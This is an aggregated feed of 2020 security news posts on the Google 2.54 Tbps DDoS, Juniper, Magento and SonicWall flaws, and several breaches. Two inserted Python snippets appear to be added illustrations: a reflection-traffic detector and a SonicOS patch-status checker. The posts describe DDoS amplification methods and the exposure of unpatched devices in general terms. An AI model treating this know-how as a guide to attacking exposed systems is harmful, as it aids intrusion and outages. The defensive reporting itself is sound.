The Google Cloud team revealed that back in September 2017 it mitigated a powerful DDoS attack that clocked in at 2.54 Tbps.

This attack is the largest distributed denial of service attack recorded to date.

“Our infrastructure absorbed a 2.5 Tbps DDoS in September 2017, the culmination of a six-month campaign that utilized multiple methods of attack. Despite simultaneously targeting thousands of our IPs, presumably in hopes of slipping past automated defenses, the attack had no impact.” reads the post published by Damian Menscher, a Security Reliability Engineer for Google Cloud.

“The attacker used several networks to spoof 167 Mpps (millions of packets per second) to 180,000 exposed CLDAP, DNS, and SMTP servers, which would then send large responses to us.”


Google researchers pointed out that the attack they mitigated was four times larger than the 623 Gbps attack launched from the Mirai botnet in 2016.

Experts noticed that this attack is bigger than the 2.3 Tbps DDoS attack mitigated by Amazon’s AWS in February.

A report published by the Google Threat Analysis Group (TAG) speculates that the attack was carried out by a state-sponsored threat actor.

“we’ve seen bigger players increase their capabilities in launching large-scale attacks in recent years. For example in 2017, our Security Reliability Engineering team measured a record-breaking UDP amplification attack sourced out of several Chinese ISPs (ASNs 4134, 4837, 58453, and 9394), which remains the largest bandwidth attack of which we are aware.” reads the report published by Google.

Menscher revealed that the attack was part of a campaign that leveraged multiple DDoS amplification methods to hit Google’s servers.

Google decided to disclose the DDoS attack today to warn of an increasing trend of state-sponsored actors abusing DDoS attacks to target online resources.

Experts believe that DDoS attacks are becoming even more dangerous and will intensify in the coming years.
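As an added illustration (not Google's code or the page's own), the following Python sketches how a defender could spot the reflection pattern Menscher describes in NetFlow-style records: unsolicited UDP replies from CLDAP and DNS service ports arriving at a local host that never queried those servers. The flow records, thresholds and IP addresses (RFC 5737 documentation ranges) are constructed.

```python
"""Flag unsolicited UDP reflection traffic in NetFlow-style records.

Added example, not Google's tooling. In a reflection/amplification attack,
spoofed requests are sent to open CLDAP/DNS services, which answer the
spoofed source (the victim). From the victim's side that shows up as many
UDP flows *from* well-known service ports that no local host ever queried.
SMTP reflection is TCP-based and not modelled here.
"""
from collections import defaultdict
from dataclasses import dataclass

# Source ports of the reflector services named in Google's description.
REFLECTOR_PORTS = {389: "CLDAP", 53: "DNS"}


@dataclass(frozen=True)
class Flow:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str      # "udp" or "tcp"
    packets: int
    bytes: int


def find_reflection_victims(flows, local_prefix, min_reflectors=3, min_avg_bytes=1000):
    """Return {victim_ip: summary} for local hosts that receive unsolicited
    replies from many distinct reflectors with a large average packet size."""
    # Which (local host, remote server, service port) triples were actually
    # queried, so genuine DNS/LDAP answers are not mistaken for an attack.
    requested = set()
    for f in flows:
        if f.proto == "udp" and f.src_ip.startswith(local_prefix) and f.dst_port in REFLECTOR_PORTS:
            requested.add((f.src_ip, f.dst_ip, f.dst_port))

    per_victim = defaultdict(lambda: {"reflectors": set(), "packets": 0,
                                      "bytes": 0, "services": defaultdict(int)})
    for f in flows:
        if f.proto != "udp" or f.src_port not in REFLECTOR_PORTS:
            continue
        if not f.dst_ip.startswith(local_prefix):
            continue
        if (f.dst_ip, f.src_ip, f.src_port) in requested:
            continue  # solicited answer to a real query
        v = per_victim[f.dst_ip]
        v["reflectors"].add(f.src_ip)
        v["packets"] += f.packets
        v["bytes"] += f.bytes
        v["services"][REFLECTOR_PORTS[f.src_port]] += f.bytes

    result = {}
    for ip, v in per_victim.items():
        avg = v["bytes"] / v["packets"]
        if len(v["reflectors"]) >= min_reflectors and avg >= min_avg_bytes:
            result[ip] = {
                "reflectors": len(v["reflectors"]),
                "packets": v["packets"],
                "bytes": v["bytes"],
                "avg_bytes_per_packet": round(avg, 1),
                "top_service": max(v["services"], key=v["services"].get),
            }
    return result


# Constructed sample flows (not real traffic). Local network is 203.0.113.0/24.
SAMPLE_FLOWS = [
    # Legitimate: a local resolver queries a DNS server and gets its answer.
    Flow("203.0.113.10", 51234, "198.51.100.5", 53, "udp", 1, 70),
    Flow("198.51.100.5", 53, "203.0.113.10", 51234, "udp", 1, 120),
    # Attack: four CLDAP reflectors and one DNS reflector send large
    # unsolicited replies to 203.0.113.20, which never queried them.
    Flow("192.0.2.11", 389, "203.0.113.20", 40001, "udp", 2000, 2_800_000),
    Flow("192.0.2.12", 389, "203.0.113.20", 40002, "udp", 2000, 2_800_000),
    Flow("192.0.2.13", 389, "203.0.113.20", 40003, "udp", 2000, 2_800_000),
    Flow("192.0.2.14", 389, "203.0.113.20", 40004, "udp", 2000, 2_800_000),
    Flow("198.51.100.9", 53, "203.0.113.20", 40005, "udp", 500, 600_000),
    # Unrelated TCP traffic is ignored.
    Flow("192.0.2.50", 443, "203.0.113.30", 50000, "tcp", 10, 5000),
]

if __name__ == "__main__":
    for victim, info in find_reflection_victims(SAMPLE_FLOWS, "203.0.113.").items():
        print(victim, info)
```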

Pierluigi Paganini

(SecurityAffairs – hacking, distributed denial of service)

The post Google mitigated a 2.54 Tbps DDoS attack in 2017, the largest DDoS ever seen appeared first on Security Affairs.

Threat Roundup for October 9 to October 16

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between October 9 and October 16. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference

20201016-tru.json – this is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

The post Threat Roundup for October 9 to October 16 appeared first on Cisco Blogs.

Juniper fixes tens of flaws affecting the Junos OS

Juniper Networks has addressed tens of vulnerabilities, including serious flaws that can be exploited to take over vulnerable systems.

Juniper Networks has addressed tens of vulnerabilities, including serious issues that can be exploited to take control of vulnerable systems.

The vendor has published 40 security advisories covering vulnerabilities in the Junos OS operating system that runs on Juniper’s firewalls and in other third-party components.

The vendor addressed multiple critical flaws in the Juniper Networks Mist Cloud UI. The vulnerabilities affect Security Assertion Markup Language (SAML) authentication and could be exploited by a remote attacker to bypass it.

“Juniper Networks Mist Cloud UI, when SAML authentication is enabled, may incorrectly handle SAML responses, allowing a remote attacker to bypass SAML authentication security controls.” reads the security advisory published by Juniper.

“If SAML authentication is not enabled, the product is not affected. These vulnerabilities can be exploited alone or in combination. The CVSS score below represents the worst case chaining of these vulnerabilities.”

Multiple vulnerabilities in Juniper Networks Junos OS have been fixed by updating third party software included with Junos OS devices.

Juniper fixed a critical remote code execution vulnerability in the telnetd Telnet server, tracked as CVE-2020-10188.

“A vulnerability in the telnetd Telnet server allows remote attackers to execute arbitrary code via short writes or urgent data, because of a buffer overflow involving the netclear and nextitem functions.” reads the advisory.

“This issue only affects systems with inbound Telnet service enabled. SSH service is unaffected by this vulnerability.”

The company also addressed high-severity denial-of-service (DoS) and arbitrary code execution issues.

The good news is that Juniper is not aware of attacks in the wild exploiting the vulnerabilities.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) also urges organizations to apply the security updates released by the vendor.

“Juniper Networks has released security updates to address vulnerabilities affecting multiple products. An attacker could exploit some of these vulnerabilities to take control of an affected system.” reads the alert issued by CISA.

“The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Juniper Networks security advisories page and apply the necessary updates.”

Pierluigi Paganini

(SecurityAffairs – hacking, Junos)

The post Juniper fixes tens of flaws affecting the Junos OS appeared first on Security Affairs.

Britain’s information commissioner fines British Airways for 2018 Hack

Britain’s information commissioner has fined British Airways 20 million pounds for the 2018 hack that exposed data of 400,000 customers.

In September 2018, British Airways suffered a data breach that exposed the personal information of 400,000 customers.

The hackers potentially accessed the personal data of approximately 429,612 customers and staff. Exposed data included names, addresses, payment card numbers and CVV numbers of 244,000 BA customers.

Experts believe the hackers also accessed the combined card and CVV numbers of 77,000 customers and card numbers only for 108,000 customers.

An investigation conducted by researchers at RiskIQ revealed that the attack on the airline was carried out by the notorious crime gang MageCart.

Now Britain’s information commissioner (British ICO) has fined British Airways 20 million pounds (approximately $25 million) for failing to protect personal data belonging to its customers. This is the largest fine the British ICO has ever issued.

The ICO fined the airline because it failed to implement adequate security measures; the company detected the security breach only two months after the initial compromise.

“People entrusted their personal details to BA and BA failed to take adequate measures to keep those details secure.” said Information Commissioner Elizabeth Denham.

“Their failure to act was unacceptable and affected hundreds of thousands of people, which may have caused some anxiety and distress as a result. That’s why we have issued BA with a £20m fine – our biggest to date.”

“When organisations take poor decisions around people’s personal data, that can have a real impact on people’s lives. The law now gives us the tools to encourage businesses to make better decisions about data, including investing in up-to-date security.”

The ICO issued the penalty under the Data Protection Act 2018 for infringements of the GDPR.

As a reminder, under the European Union’s General Data Protection Regulation, in force since 2018, organizations face fines of up to 20 million euros ($23 million) or 4% of annual global turnover.

“The ICO has specific responsibilities set out in the Data Protection Act 2018, the General Data Protection Regulation (GDPR), the Freedom of Information Act 2000, Environmental Information Regulations 2004 and Privacy and Electronic Communications Regulations 2003. This penalty was issued under the Data Protection Act 2018 for infringements of the GDPR.” concludes the ICO.

Pierluigi Paganini

(SecurityAffairs – hacking, British Airways)

The post Britain’s information commissioner fines British Airways for 2018 Hack appeared first on Security Affairs.

Breach at Dickey’s Barbecue Pit compromises 3 million Cards

Dickey’s Barbecue Pit, the largest barbecue restaurant chain in the US, suffered a POS breach; card details for 3 million customers were posted online.

Dickey’s Barbecue Pit is a family-owned American barbecue restaurant chain. The company suffered a POS breach, and card details of more than three million customers have been posted on the carding portal Joker’s Stash.

The huge trove of payment card data was spotted by researchers from the cyber-security firm Gemini Advisory.

The Joker’s Stash dark web marketplace is one of the most popular carding websites; it is known for advertising and selling card details from major breaches.

The card details of Dickey’s Barbecue Pit’s customers were included in a dump titled “BLAZINGSUN.” Joker’s Stash originally claimed that the breach would be available in August, then again in September, and finally it was posted online on October 12.

“Gemini Advisory determined that the compromised point of purchase (CPP) was Dickey’s Barbecue Pit, a US-based restaurant franchise.” reads the post published by Gemini Advisory.

“The advertisement claimed that BLAZINGSUN would contain 3 million compromised cards with both track 1 and track 2 data. They purportedly came from 35 US states and “some” countries across Europe and Asia.”

This BLAZINGSUN breach contains 3 million compromised payment records that are available for a median price of $17 per card.

The experts worked with several partner financial institutions who independently confirmed the authenticity of the stolen data.

According to Gemini, the hackers obtained the card details after compromising the in-store Point-of-Sale (POS) system used at Dickey’s Barbecue Pit restaurants.

Crooks compromised 156 of Dickey’s 469 locations across 30 states, most of them in California and Arizona.

Dickey’s locations are marked by the blue restaurant icon while the locations confirmed to be compromised are marked in red.

The compromise took place between July 2019 and August 2020. Gemini reported that the root cause of the security breach was the use of the outdated magstripe method for payment transactions, which exposed cardholders to PoS malware attacks.

The company published an official statement confirming that it immediately started its incident response procedure.

“We received a report indicating that a payment card security incident may have occurred. We are taking this incident very seriously and immediately initiated our response protocol and an investigation is underway. We are currently focused on determining the locations affected and time frames involved.” reads the statement provided by the company. “We are utilizing the experience of third parties who have helped other restaurants address similar issues and also working with the FBI and payment card networks. We understand that payment card network rules generally provide that individuals who timely report unauthorized charges to the bank that issued their card are not responsible for those charges.”

The payment card records are mostly for cards using outdated magstripe technologies and are being sold for a median price of $17 per card.

“Based on previous Joker’s Stash major breaches, the records from Dickey’s will likely continue to be added to this marketplace over several months.” concludes the post.

Pierluigi Paganini

(SecurityAffairs – hacking, Dickey’s Barbecue Pit)

The post Breach at Dickey’s Barbecue Pit compromises 3 million Cards appeared first on Security Affairs.

Adobe fixes Magento flaws that can lead to code execution

Adobe released a series of out-of-band security fixes to address multiple Magento vulnerabilities that lead to code execution, customer list tampering.

Adobe has released a series of out-of-band security fixes to address multiple Magento vulnerabilities that lead to code execution, customer list tampering.

Eight of the vulnerabilities are considered either critical or important; only one is considered a moderate-severity flaw. The critical flaws are tracked as CVE-2020-24407 and CVE-2020-24400.

Below is the list of affected versions:

Product             | Version                       | Platform
Magento Commerce    | 2.3.5-p1 and earlier versions | All
Magento Commerce    | 2.4.0 and earlier versions    | All
Magento Open Source | 2.3.5-p1 and earlier versions | All
Magento Open Source | 2.4.0 and earlier versions    | All

One of the critical flaws addressed by Adobe is an allow-list bypass in the file upload feature. Another critical SQL injection issue can lead to the execution of arbitrary code or arbitrary read/write database access. Both issues require an attacker to have already obtained admin privileges.

Adobe has also addressed a vulnerability, tracked as CVE-2020-24402, that can allow attackers to manipulate and modify customer lists. 

Other flaws fixed by Adobe include a stored cross-site scripting (XSS) issue (CVE-2020-24408), a user session invalidation bug (CVE-2020-24401), and a security vulnerability that allows Magento CMS pages to be modified without permission (CVE-2020-24404). The company also addressed two restricted resource access bugs, tracked as CVE-2020-24405 and CVE-2020-24403 respectively, and unintended disclosure of a document root path that could lead to sensitive information disclosure (CVE-2020-24406).

This week, Adobe has also released a security update to address a critical remote code execution flaw in Adobe Flash Player (CVE-2020-9746) that could be exploited by threat actors by tricking the victims into visiting a website.

Attackers could exploit this flaw by inserting malicious strings into HTTP responses while unsuspecting users visit a website.

Pierluigi Paganini

(SecurityAffairs – hacking, Adobe)

The post Adobe fixes Magento flaws that can lead to code execution appeared first on Security Affairs.

U.S. Federal Court Issues Restraining Order against Tech Support Scheme

A federal court in the United States issued a temporary restraining order against a tech support scheme that’s alleged to have targeted U.S. consumers. On October 15, a complaint was filed in the U.S. District Court for the Southern District of Florida against Michael Brian Cotter, 59, of Glendale, California. The complaint alleged that Cotter had worked with […]

The post U.S. Federal Court Issues Restraining Order against Tech Support Scheme appeared first on The State of Security.

Almost 800,000 SonicWall VPN appliances online are vulnerable to CVE-2020-5135

The Tripwire VERT security team spotted almost 800,000 SonicWall VPN appliances exposed online that are vulnerable to the CVE-2020-5135 RCE flaw.

Security experts from the Tripwire VERT security team have discovered 795,357 SonicWall VPN appliances exposed online that are vulnerable to the CVE-2020-5135 RCE flaw.

“A buffer overflow vulnerability in SonicOS allows a remote attacker to cause Denial of Service (DoS) and potentially execute arbitrary code by sending a malicious request to the firewall. This vulnerability affected SonicOS Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version 7.0.0.0.” reads the advisory published by SonicWall.

CVE-2020-5135 is a stack-based buffer overflow that affects the SonicWall Network Security Appliance (NSA). The vulnerability can be triggered by an unauthenticated HTTP request involving a custom protocol handler.

The flaw resides in the HTTP/HTTPS service used for product management as well as SSL VPN remote access.

“An unskilled attacker can use this flaw to cause a persistent denial of service condition. Tripwire VERT has also confirmed the ability to divert execution flow through stack corruption indicating that a code execution exploit is likely feasible.” reads the analysis published by Tripwire. “This flaw exists pre-authentication and within a component (SSLVPN) which is typically exposed to the public Internet.”

This vulnerability is very dangerous, especially during the COVID-19 pandemic, because SonicWall NSA devices are used as firewalls and as SSL VPN portals that allow remote employees to access corporate networks.

The vulnerability affects the following versions:

  • SonicOS 6.5.4.7-79n and earlier
  • SonicOS 6.5.1.11-4n and earlier
  • SonicOS 6.0.5.3-93o and earlier
  • SonicOSv 6.5.4.4-44v-21-794 and earlier
  • SonicOS 7.0.0.0-1

Security experts from Tenable have published a post detailing the flaw, they also shared Shodan dorks for searching SonicWall VPNs.

“Our own Shodan search for vulnerable SonicWall devices led us to two specific search queries:

The combined results from Shodan using these search queries led to a total of 795,674 hosts. In the VERT advisory, they specified that 795,357 hosts were vulnerable.” wrote Tenable.

At the time of this post, the first search query returns 448,400 results and the second one 24,149; most of the vulnerable devices are in the United States.

SonicWall has already released updates to address the flaw; the company also recommends disconnecting SSL VPN portals from the Internet as a temporary mitigation before installing one of the following versions:

  • SonicOS 6.5.4.7-83n
  • SonicOS 6.5.1.12-1n
  • SonicOS 6.0.5.3-94o
  • SonicOS 6.5.4.v-21s-987
  • Gen 7 7.0.0.0-2 and onwards

CVE-2020-5135 is a critical vulnerability rated 9.4 out of 10; it could be easily exploited by unauthenticated attackers.

At the time this post was published, no PoC exploit code was available for the CVE-2020-5135 flaw.
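As an added helper (not SonicWall's or Tripwire's code), the Python below maps a SonicOS version string onto the affected and fixed builds listed above, treating anything below the first fixed build of a branch as vulnerable. It assumes the version format <release>-<build><suffix> (e.g. 6.5.4.7-79n); SonicOSv's different scheme (6.5.4.v-21s-987) is reported as unknown rather than guessed.

```python
"""Classify a SonicOS version string against the CVE-2020-5135 fix list.

Added example, not vendor code. Version strings are parsed as
<dotted release>-<build><letters>, e.g. "6.5.4.7-79n" -> release (6,5,4,7),
build 79. A version is compared only within its own branch (first three
release components), so 6.5.4.x is never judged against the 6.5.1.x fix.
"""
import re

# First fixed build per branch, taken from the vendor list above.
FIXED = {
    (6, 5, 4): "6.5.4.7-83n",
    (6, 5, 1): "6.5.1.12-1n",
    (6, 0, 5): "6.0.5.3-94o",
    (7, 0, 0): "7.0.0.0-2",
}

# Four dotted integers, a dash, a numeric build, optional trailing letters.
_VER = re.compile(r"^(\d+(?:\.\d+){3})-(\d+)([a-z]*)$")


def parse(version):
    """Return (release_tuple, build) or None if the format is not recognised."""
    m = _VER.match(version.strip())
    if not m:
        return None
    release = tuple(int(x) for x in m.group(1).split("."))
    return release, int(m.group(2))


def status(version):
    """Return 'vulnerable', 'fixed' or 'unknown' for a SonicOS version string."""
    parsed = parse(version)
    if parsed is None:
        return "unknown"            # SonicOSv scheme or garbage input
    release, build = parsed
    fixed = FIXED.get(release[:3])
    if fixed is None:
        return "unknown"            # branch not covered by the advisory list
    # Anything at or above the first fixed build of the branch is fixed;
    # everything below it (including the "and earlier" builds) is vulnerable.
    return "fixed" if (release, build) >= parse(fixed) else "vulnerable"


if __name__ == "__main__":
    for v in ("6.5.4.7-79n", "6.5.4.7-83n", "6.5.1.11-4n", "7.0.0.0-1",
              "6.5.4.4-44v-21-794"):
        print(v, "->", status(v))
```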

Pierluigi Paganini

(SecurityAffairs – hacking, CVE-2020-5135)

The post Almost 800,000 SonicWall VPN appliances online are vulnerable to CVE-2020-5135 appeared first on Security Affairs.

Iran acknowledged cyberattacks on two governmental departments

Iran’s cybersecurity authority revealed that two governmental departments were hit by cyberattacks this week, state media reported.

State media reported on Thursday that Iran’s cybersecurity authority acknowledged cyberattacks on two unnamed governmental departments.

The state-owned IRAN daily newspaper revealed that the cyberattacks took place on Tuesday and Wednesday respectively.

Iranian authorities are investigating the attacks, which were described as important.

Other governmental departments temporarily took down their online operations as a precautionary measure.

Iran’s cybersecurity authority did not attribute the attacks to a specific threat actor.

This isn’t the first time that Iran’s authorities have claimed to be targeted by cyber attacks. In December 2019, the Iranian telecommunications minister announced twice in one week that the country had foiled a cyber attack against its infrastructure.

At the time, the Iranian minister Mohammad Javad Azari-Jahromi confirmed that the attack was neutralized by the national cyber shield, and added that it had been launched by the China-linked APT27 group seeking to gather intelligence on the country.

In October 2019, Iran announced it feared retaliation from Western countries, which accuse it of carrying out physical and cyber attacks against their infrastructure and against countries in the Middle East.

At the time, Iran’s oil ministry said that the government in Washington had launched a “full-scale economic war” against the Islamic Republic in retaliation for the shooting down of a US drone, as well as for attacks on oil tankers for which the US blamed Iran.

Tensions between Tehran and Washington have escalated since 2018, when President Trump reimposed sanctions on Iran. They rose sharply after a US drone strike killed top Iranian general Qasem Soleimani in January.

The order to kill Soleimani was issued by President Trump, who said Soleimani was planning an “imminent” attack on US personnel in Baghdad.

In January, the U.S. Department of Homeland Security (DHS) issued warnings about possible cyber-attacks by Iran-linked threat actors. Such attacks could be Tehran’s response to the killing of Maj. Gen. Qasem Soleimani by a U.S. drone airstrike at the Baghdad airport in Iraq.

Pierluigi Paganini


The post Iran acknowledged cyberattacks on two governmental departments appeared first on Security Affairs.

Crooks hit Puerto Rico Firefighting Department Servers

Puerto Rico’s firefighting department discloses a security breach, hackers breached its database and demanded $600,000.

Puerto Rico’s firefighting department discloses a security breach, hackers breached its database and demanded a $600,000 ransom.

According to the department’s director, Alberto Cruz, the ability of the department to respond to emergencies was not impacted by the attack.

The department received an email from the threat actors notifying it that they had encrypted its servers and demanding payment of a ransom to release them.

Local police launched an investigation into the incident, and the department decided not to pay the ransom.

“The department contacted police and have not paid the money, officials said. The investigation is ongoing.” reported the Associated Press.

Pierluigi Paganini


The post Crooks hit Puerto Rico Firefighting Department Servers appeared first on Security Affairs.

Barnes & Noble warns customers it has been hacked, customer data may have been accessed

American bookselling giant Barnes & Noble is contacting customers via email, warning them that its network was breached by hackers, and that sensitive information about shoppers may have been accessed. In the email to customers, Barnes & Noble says that it became aware that it had fallen victim to a cybersecurity attack on Saturday October […]

The post Barnes & Noble warns customers it has been hacked, customer data may have been accessed appeared first on The State of Security.

Threat Roundup for October 2 to October 9

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between October 2 and October 9. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics and indicators of compromise, and by discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference

20201009-tru.json – this is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

The post Threat Roundup for October 2 to October 9 appeared first on Cisco Blogs.

Hackers disguise malware attack as new details on Donald Trump’s COVID-19 illness

The confirmation that US President Donald Trump has been infected by the Coronavirus, and had to spend time this weekend in hospital, has – understandably – made headlines around the world. And there are plenty of people, on both sides of the political divide, who are interested in learning more about his health status. It’s […]

The post Hackers disguise malware attack as new details on Donald Trump’s COVID-19 illness appeared first on The State of Security.